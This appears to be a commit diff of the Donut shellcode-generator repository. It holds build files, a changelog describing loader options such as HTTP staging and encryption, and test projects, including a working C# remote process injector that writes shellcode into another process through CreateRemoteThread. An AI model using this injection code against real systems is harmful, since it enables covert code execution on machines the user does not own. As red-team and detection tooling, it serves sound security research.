donut-shellcode / a77d707
New upstream version 0.9.3+git20220530.e75bdcd Sophie Brun 1 year, 10 months ago
182 changed file(s) with 27943 addition(s) and 13256 deletion(s).
0 ## Ignore Visual Studio temporary files, build results, and
1 ## files generated by popular Visual Studio add-ons.
2
3 # User-specific files
4 *.suo
5 *.user
6 *.sln.docstates
7
8 # Build results
9 [Dd]ebug/
10 [Dd]ebugPublic/
11 [Rr]elease/
12 [Rr]eleases/
13 x64/
14 x86/
15 bld/
16 [Bb]in/
17 [Oo]bj/
18 build/
19
20 # Roslyn cache directories
21 *.ide/
22 .vs/
23
24 # MSTest test Results
25 [Tt]est[Rr]esult*/
26 [Bb]uild[Ll]og.*
27
28 # NUnit
29 *.VisualState.xml
30 TestResult.xml
31 nunit-*.xml
32
33 # Build Results of an ATL Project
34 [Dd]ebugPS/
35 [Rr]eleasePS/
36 dlldata.c
37
38 *_i.c
39 *_p.c
40 *_i.h
41 *.ilk
42 *.meta
43 *.obj
44 *.pch
45 *.pdb
46 *.pgc
47 *.pgd
48 *.rsp
49 *.sbr
50 *.tlb
51 *.tli
52 *.tlh
53 *.tmp
54 *.tmp_proj
55 *.log
56 *.vspscc
57 *.vssscc
58 .builds
59 *.pidb
60 *.svclog
61 *.scc
62
63 # Chutzpah Test files
64 _Chutzpah*
65
66 # Visual C++ cache files
67 ipch/
68 *.aps
69 *.ncb
70 *.opensdf
71 *.sdf
72 *.cachefile
73
74 # Visual Studio profiler
75 *.psess
76 *.vsp
77 *.vspx
78
79 # TFS 2012 Local Workspace
80 $tf/
81
82 # Guidance Automation Toolkit
83 *.gpState
84
85 # ReSharper is a .NET coding add-in
86 _ReSharper*/
87 *.[Rr]e[Ss]harper
88 *.DotSettings.user
89
90 # JustCode is a .NET coding addin-in
91 .JustCode
92
93 # TeamCity is a build add-in
94 _TeamCity*
95
96 # DotCover is a Code Coverage Tool
97 *.dotCover
98
99 # NCrunch
100 _NCrunch_*
101 .*crunch*.local.xml
102
103 # MightyMoose
104 *.mm.*
105 AutoTest.Net/
106
107 # Web workbench (sass)
108 .sass-cache/
109
110 # Installshield output folder
111 [Ee]xpress/
112
113 # DocProject is a documentation generator add-in
114 DocProject/buildhelp/
115 DocProject/Help/*.HxT
116 DocProject/Help/*.HxC
117 DocProject/Help/*.hhc
118 DocProject/Help/*.hhk
119 DocProject/Help/*.hhp
120 DocProject/Help/Html2
121 DocProject/Help/html
122
123 # Click-Once directory
124 publish/
125
126 # Publish Web Output
127 *.[Pp]ublish.xml
128 *.azurePubxml
129 # TODO: Comment the next line if you want to checkin your web deploy settings
130 # but database connection strings (with potential passwords) will be unencrypted
131 *.pubxml
132 *.publishproj
133
134 # NuGet Packages
135 *.nupkg
136 # The packages folder can be ignored because of Package Restore
137 **/packages/*
138 # except build/, which is used as an MSBuild target.
139 !**/packages/build/
140 # If using the old MSBuild-Integrated Package Restore, uncomment this:
141 #!**/packages/repositories.config
142 Packages.dgml
143
144 # Windows Azure Build Output
145 csx/
146 *.build.csdef
147
148 # Windows Store app package directory
149 AppPackages/
150
151 # Others
152 sql/
153 *.Cache
154 ClientBin/
155 [Ss]tyle[Cc]op.*
156 ~$*
157 *~
158 *.dbmdl
159 *.dbproj.schemaview
160 *.pfx
161 *.publishsettings
162 node_modules/
163
164 # RIA/Silverlight projects
165 Generated_Code/
166
167 # Backup & report files from converting an old project file
168 # to a newer Visual Studio version. Backup files are not needed,
169 # because we have git ;-)
170 _UpgradeReport_Files/
171 Backup*/
172 UpgradeLog*.XML
173 UpgradeLog*.htm
174
175 # SQL Server files
176 *.mdf
177 *.ldf
178
179 # Business Intelligence projects
180 *.rdl.data
181 *.bim.layout
182 *.bim_*.settings
183
184 # Microsoft Fakes
185 FakesAssemblies/
186
187 # =========================
188 # Operating System Files
189 # =========================
190
191 # OSX
192 # =========================
193
194 .DS_Store
195 .AppleDouble
196 .LSOverride
197
198 # Icon must end with two \r
199 Icon
200
201
202 # Thumbnails
203 ._*
204
205 # Files that might appear on external disk
206 .Spotlight-V100
207 .Trashes
208
209 # Directories potentially created on remote AFP share
210 .AppleDB
211 .AppleDesktop
212 Network Trash Folder
213 Temporary Items
214 .apdisk
215
216 # Windows
217 # =========================
218
219 # Windows image file caches
220 Thumbs.db
221 ehthumbs.db
222
223 # Folder config file
224 Desktop.ini
225
226 # Recycle Bin used on file shares
227 $RECYCLE.BIN/
228
229 # Windows Installer files
230 *.cab
231 *.msi
232 *.msm
233 *.msp
234
235 #OpenCover output
236 coverage.xml
237
238 #Msbuild binary log output
239 output.binlog
240
241 # KDiff3
242 *_BACKUP_*
243 *_BASE_*
244 *_LOCAL_*
245 *_REMOTE_*
246 *.orig
247
248 AkavacheSqliteLinkerOverride.cs
249 NuGetBuild
250 WiX.Toolset.DummyFile.txt
251 GitHubVS.sln.DotSettings
0 [submodule "generators/go-donut"]
1 path = generators/go-donut
2 url = https://github.com/Binject/go-donut
0 # Changelog
1 All notable changes to this project will be documented in this file.
2
3 ## [0.9.3]
4
5 ### Added
6
7 * The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
8 * The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
9 * The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
10 * The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
11 * The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
12 * The -s switch specifies the HTTP server to download module from.
13 * The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
14 * The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
15 * The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
16 * The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
17 * C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
18 * Go generator by awgh https://github.com/Binject/go-donut
19
20 ### Changed
21
22 * Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
23 * The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
24 * The -f switch to specify input file is now used to specify output format of loader.
25
26 ### Removed
27
28 * XSL files are no longer supported.
29 * Code stub for calling DLL function with multiple arguments.
0 using System.Diagnostics;
1
2 public class TestClass
3 {
4 public static void RunProcess(string path, string path2)
5 {
6 System.Console.WriteLine("[STDOUT] Running {0} and {1}...", path, path2);
7 System.Console.Error.WriteLine("[STDERR] Running {0} and {1}...", path, path2);
8 Process.Start(path);
9 Process.Start(path2);
10 }
11 }
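Review bot: `RunProcess` has no doc comment and no handling around its two `Process.Start` calls, so if starting `path` throws, `path2` is never launched, and both returned `Process` objects are left undisposed. A summary such as `/// Test fixture: starts the two given executables so a loader run can be confirmed end to end.` would state the intent. Each call can be wrapped as `using (Process.Start(path)) { }` to release the handle deterministically.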
0 <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
1 <PropertyGroup>
2 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
3 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
4 <ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
5 <OutputType>Library</OutputType>
6 <NoStandardLibraries>false</NoStandardLibraries>
7 <AssemblyName>DemoCreateProcess</AssemblyName>
8 <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
9 <FileAlignment>512</FileAlignment>
10 </PropertyGroup>
11 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
12 <DebugSymbols>true</DebugSymbols>
13 <DebugType>full</DebugType>
14 <Optimize>false</Optimize>
15 <OutputPath>bin\Debug\</OutputPath>
16 <DefineConstants>DEBUG;TRACE</DefineConstants>
17 <ErrorReport>prompt</ErrorReport>
18 <WarningLevel>4</WarningLevel>
19 </PropertyGroup>
20 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
21 <DebugType>pdbonly</DebugType>
22 <Optimize>true</Optimize>
23 <OutputPath>bin\Release\</OutputPath>
24 <DefineConstants>TRACE</DefineConstants>
25 <ErrorReport>prompt</ErrorReport>
26 <WarningLevel>4</WarningLevel>
27 </PropertyGroup>
28 <PropertyGroup>
29 <RootNamespace>DemoCreateProcess</RootNamespace>
30 </PropertyGroup>
31 <ItemGroup>
32 <Reference Include="Microsoft.CSharp" />
33 <Reference Include="System" />
34 <Reference Include="System.Core" />
35 <Reference Include="System.Data" />
36 <Reference Include="System.Data.DataSetExtensions" />
37 <Reference Include="System.Xml" />
38 <Reference Include="System.Xml.Linq" />
39 </ItemGroup>
40 <ItemGroup>
41 <Compile Include="Class1.cs" />
42 </ItemGroup>
43 <ItemGroup>
44 <None Include="Readme.md" />
45 </ItemGroup>
46 <Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
47 <ProjectExtensions>
48 <VisualStudio AllowExistingFolder="true" />
49 </ProjectExtensions>
50 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
23 EndGlobalSection
24 EndGlobal
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DemoCreateProcess")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DemoCreateProcess")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # DemoCreateProcess
1
2 A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
3
4 64-bit:
5
6 ```
7 .\donut.exe -i .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
8 ```
9
10 32-bit:
11
12 ```
13 .\donut.exe -i -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
14 ```
15
16 # Building on Linux
17
18 This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
19
20 To build the project, simply `cd` to its root directory and run:
21
22 ```
23 xbuild
24 ```
25
26 To build in Release mode, run:
27
28 ```
29 xbuild /p:Configuration=Release
30 ```
31
32 If receiving errors about missing dependencies, try specifying the targeted .NET version:
33
34 ```
35 xbuild /p:TargetFrameworkVersion="v4.5"
36 ```
37
38 Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3 <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
4 </startup>
5 </configuration>
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>DonutTest</RootNamespace>
9 <AssemblyName>DonutTest</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <ItemGroup>
37 <Reference Include="System" />
38 <Reference Include="System.Core" />
39 <Reference Include="System.Xml.Linq" />
40 <Reference Include="System.Data.DataSetExtensions" />
41 <Reference Include="Microsoft.CSharp" />
42 <Reference Include="System.Data" />
43 <Reference Include="System.Net.Http" />
44 <Reference Include="System.Xml" />
45 </ItemGroup>
46 <ItemGroup>
47 <Compile Include="Program.cs" />
48 <Compile Include="Properties\AssemblyInfo.cs" />
49 </ItemGroup>
50 <ItemGroup>
51 <None Include="App.config" />
52 </ItemGroup>
53 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
54 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
6 EndProject
7 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
8 EndProject
9 Global
10 GlobalSection(SolutionConfigurationPlatforms) = preSolution
11 Debug|Any CPU = Debug|Any CPU
12 Release|Any CPU = Release|Any CPU
13 EndGlobalSection
14 GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
16 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
17 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
18 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
19 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
20 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
21 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
22 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
23 EndGlobalSection
24 GlobalSection(SolutionProperties) = preSolution
25 HideSolutionNode = FALSE
26 EndGlobalSection
27 GlobalSection(ExtensibilityGlobals) = postSolution
28 SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
29 EndGlobalSection
30 EndGlobal
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9 }
10 }
11 }
0 /* Author: TheWover
1 Description: Injects shellcode into an arbitrary hardcoded process using native Windows 32 API calls.
2 Last Modified: 03/28/2020
3 */
4 using System;
5 using System.Diagnostics;
6 using System.Runtime.InteropServices;
7
8 namespace ShellcodeTest
9 {
10 public class Program
11 {
12 static string x64 = @"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";
13 static string x86 = @"";
14
15 static int pid = Process.GetCurrentProcess().Id;
16
17 static void Main(string[] args)
18 {
19 if (args.Length >= 1)
20 {
21 pid = Convert.ToInt32(args[0]);
22
23 //If a raw shellcode file was provided as a second argument
24 if (args.Length == 2)
25 {
26 Console.WriteLine("[+] Reading shellcode from {0}.", args[1]);
27
28 Inject(System.IO.File.ReadAllBytes(args[1]), pid);
29 }
30 else
31 {
32 Console.WriteLine("[+] Using embedded shellcode.");
33
34 Inject(x86, x64, pid);
35 }
36 }
37 }
38
39 [DllImport("kernel32.dll")]
40 public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
41
42 [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
43 public static extern IntPtr GetModuleHandle(string lpModuleName);
44
45 [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
46 static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
47
48 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
49 static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
50 uint dwSize, uint flAllocationType, uint flProtect);
51
52 [DllImport("kernel32.dll", SetLastError = true)]
53 static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
54
55 [DllImport("kernel32.dll")]
56 static extern IntPtr CreateRemoteThread(IntPtr hProcess,
57 IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
58
59 const int PROCESS_CREATE_THREAD = 0x0002;
60 const int PROCESS_QUERY_INFORMATION = 0x0400;
61 const int PROCESS_VM_OPERATION = 0x0008;
62 const int PROCESS_VM_WRITE = 0x0020;
63 const int PROCESS_VM_READ = 0x0010;
64
65
66 const uint MEM_COMMIT = 0x00001000;
67 const uint MEM_RESERVE = 0x00002000;
68 const uint PAGE_READWRITE = 4;
69 const uint PAGE_EXECUTE_READWRITE = 0x40;
70
71
72 /// <summary>
73 /// An entry point callable from Donut or other Reflection-based loaders.
74 /// </summary>
75 /// <param name="procPID">The PID of the target process, as a string</param>
76 public static void Run(string procPID)
77 {
78 int pid = Convert.ToInt32(procPID);
79
80 Console.WriteLine("[+] Using embedded shellcode.");
81
82 Inject(x86, x64, pid);
83 }
84
85 /// <summary>
86 /// Injects shellcode into the target process using CreateRemoteThread, using the correct version for the process's architecture.
87 /// </summary>
88 /// <param name="x86">Base64-encoded x86 shellcode.</param>
89 /// <param name="x64">Base64-encoded x64 shellcode</param>
90 /// <param name="procPID">The PID of the target process.</param>
91 /// <returns></returns>
92 public static int Inject(string x86, string x64, int procPID)
93 {
94
95 Process targetProcess = Process.GetProcessById(procPID);
96 Console.WriteLine(targetProcess.Id);
97
98 string s;
99
100 if (IsWow64Process(targetProcess) == true)
101 s = x86;
102 else
103 s = x64;
104
105 byte[] shellcode = Convert.FromBase64String(s);
106
107 if (Inject(shellcode, procPID) != IntPtr.Zero)
108 Console.WriteLine("[!] Successfully injected into {0} ({1})!", targetProcess.ProcessName, procPID);
109 else
110 Console.WriteLine("[!] Failed to inject!");
111
112 return 0;
113 }
114
115 /// <summary>
116 /// Injects raw shellcode into the target process using CreateRemoteThread.
117 /// </summary>
118 /// <param name="shellcode">The shellcode to inject.</param>
119 /// <param name="procPID">The PID of the target process.</param>
120 /// <returns></returns>
121 public static IntPtr Inject(byte[] shellcode, int procPID)
122 {
123 IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, procPID);
124
125 IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
126
127 UIntPtr bytesWritten;
128 WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length, out bytesWritten);
129
130 return CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero);
131
132 }
133
134 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
135 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
136
137 /// <summary>
138 /// Checks whether the process is 64-bit.
139 /// </summary>
140 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
141 public static bool IsWow64Process(Process process)
142 {
143 bool retVal = false;
144 IsWow64Process(process.Handle, out retVal);
145 return retVal;
146 }
147 }
148 }
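Review bot: `Inject(byte[] shellcode, int procPID)` passes the results of `OpenProcess`, `VirtualAllocEx` and `WriteProcessMemory` straight to the next call without checking them, and the process handle is never closed (no `CloseHandle` import is declared), so any failed step only surfaces as the generic "Failed to inject!" message. Guard each step, e.g. `if (procHandle == IntPtr.Zero) return IntPtr.Zero;`, and add `SetLastError = true` to the `OpenProcess` and `CreateRemoteThread` imports so the failure reason can be reported. The XML comment on `IsWow64Process(Process)` is also inverted: the Win32 call reports true for a 32-bit process running under WOW64, which is how `Inject(string, string, int)` uses it (`true` selects `x86`), so the summary should read `/// Checks whether the process is a 32-bit process running under WOW64.`. As a detection reference, this section is the plain OpenProcess, `PAGE_EXECUTE_READWRITE` VirtualAllocEx, WriteProcessMemory, CreateRemoteThread sequence.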
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DonutTest")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DonutTest")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # DonutTest
1
2 A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
3
4 You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
5
6 ```powershell
7 $filename = "C:\\Test\donut\\loader.bin"
8 [Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
9 ```
10
11 ```
12 Usage:
13
14 DonutTest.exe [PID]
15
16 If no PID is specified, then DonutTest will inject the shellcode into itself.
17 ```
18
19 # Building on Linux
20
21 This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
22
23 To build the project, simply `cd` to its root directory and run:
24
25 ```
26 xbuild
27 ```
28
29 To build in Release mode, run:
30
31 ```
32 xbuild /p:Configuration=Release
33 ```
34
35 If receiving errors about missing dependencies, try specifying the targeted .NET version:
36
37 ```
38 xbuild /p:TargetFrameworkVersion="v4.5"
39 ```
40
41 Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
0
1 var sh
2 sh = new ActiveXObject("Wscript.Shell")
3 sh.Run("calc.exe")
4 WScript.Quit()
0
1 Dim sh
2 Set sh = CreateObject("Wscript.Shell")
3 Call sh.Run("calc.exe")
4 Set sh = Nothing
5 WScript.Quit()
6
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiVoid(VOID) {
10 MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
11 }
12
13 __declspec(dllexport)
14 VOID APIENTRY DonutApiW(PWCHAR argv) {
15 MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
16 }
17
18 __declspec(dllexport)
19 VOID APIENTRY DonutApiA(PCHAR argv) {
20 MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
21 }
22
23 __declspec(dllexport)
24 BOOL APIENTRY DllMain(HMODULE hModule,
25 DWORD ul_reason_for_call,
26 LPVOID lpReserved) {
27 switch (ul_reason_for_call) {
28 case DLL_PROCESS_ATTACH:
29 case DLL_THREAD_ATTACH:
30 case DLL_THREAD_DETACH:
31 case DLL_PROCESS_DETACH:
32 break;
33 }
34 return TRUE;
35 }
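--- a/DonutTest/hello.c
+++ b/DonutTest/hello.c
@@ -1,56 +0,0 @@
-#define UNICODE
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <inttypes.h>
-
-#include <windows.h>
-#pragma comment(lib, "user32.lib")
-#pragma comment(lib, "shell32.lib")
-
-__declspec(dllexport)
-VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
-PROCESS_INFORMATION pi;
-STARTUPINFO si;
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-}
-
-__declspec(dllexport)
-VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL WINAPI DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
-break;
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}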
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
